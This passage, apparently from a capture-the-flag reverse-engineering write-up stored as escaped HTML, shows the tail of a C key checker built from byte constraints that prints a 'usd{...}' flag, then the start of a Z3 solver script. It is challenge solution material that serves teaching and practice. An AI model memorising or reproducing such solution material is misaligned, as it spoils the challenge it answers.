class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">71<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">33<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">9<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">84<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">14<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">8<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\">  <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">21<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">5<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">108<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">11<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">115<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">12<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">&gt;&gt;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">4<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">6<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">13<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">14<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">15<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">12<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">18<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">12<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">^<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">3<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">])<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">50<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">((<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">16<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">19<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">138<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">17<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">10<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">[<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">18<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">]<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">!=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">prime<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">79<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;};<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">valid<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">){<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">printf<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"%s\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"Nice!<\/span><span class=\"se\" style=\"background: #263238;color: #EFF\">\\n<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">printf<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"usd{%s}\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">num<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);}<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">else<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">{<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">printf<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"%s\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"s\" style=\"background: #263238;color: #C3E88D\">\"Key is not valid\"<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">);<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">}<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"k\" style=\"background: #263238;color: #BB80B3\">return<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"> <\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">0<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">;<\/span><span class=\"w\" style=\"background: #263238;color: #EFF\"><\/span>\n<\/pre><\/div>\n\n\n\n<p>The program validates several assertions over the input string, if they hold, the input string represents\nthe correct flag and is returned. We can solve this challenge either by guessing (brute-force method) or\nby the usage of a theorem prover. In this solution, we use <strong>Z3<\/strong> (<strong>pip3 install z3-solver<\/strong>), but\ndifferent options are available.<\/p>\n\n\n\n<div class=\"codehilite\" style=\"background: #263238;color: #EFF\"><pre style=\"line-height: 125%\"><span style=\"background: #263238\"><\/span><span class=\"ch\" style=\"background: #263238;color: #546E7A;font-style: italic\">#!\/usr\/bin\/python<\/span>\n<span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">from<\/span> <span class=\"nn\" style=\"background: #263238;color: #FFCB6B\">z3<\/span> <span class=\"kn\" style=\"background: #263238;color: #89DDFF;font-style: italic\">import<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">*<\/span>\n<span class=\"k\" style=\"background: #263238;color: #BB80B3\">def<\/span> <span class=\"nf\" style=\"background: #263238;color: #82AAFF\">sieve<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n     <span class=\"n\" style=\"background: #263238;color: #EFF\">multiples<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">[]<\/span>\n     <span class=\"n\" style=\"background: #263238;color: #EFF\">primes<\/span> <span class=\"o\" style=\"background: #263238;color: #89DDFF\">=<\/span> <span class=\"p\" style=\"background: #263238;color: #89DDFF\">[]<\/span>\n     <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">2<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">,<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">n<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">+<\/span><span class=\"mi\" style=\"background: #263238;color: #F78C6C\">1<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">):<\/span>\n        <span class=\"k\" style=\"background: #263238;color: #BB80B3\">if<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">not<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">multiples<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">:<\/span>\n            <span class=\"n\" style=\"background: #263238;color: #EFF\">primes<\/span><span class=\"o\" style=\"background: #263238;color: #89DDFF\">.<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">append<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span class=\"n\" style=\"background: #263238;color: #EFF\">i<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">)<\/span>\n\n        <span class=\"k\" style=\"background: #263238;color: #BB80B3\">for<\/span> <span class=\"n\" style=\"background: #263238;color: #EFF\">j<\/span> <span class=\"ow\" style=\"background: #263238;color: #89DDFF;font-style: italic\">in<\/span> <span class=\"nb\" style=\"background: #263238;color: #82AAFF\">range<\/span><span class=\"p\" style=\"background: #263238;color: #89DDFF\">(<\/span><span 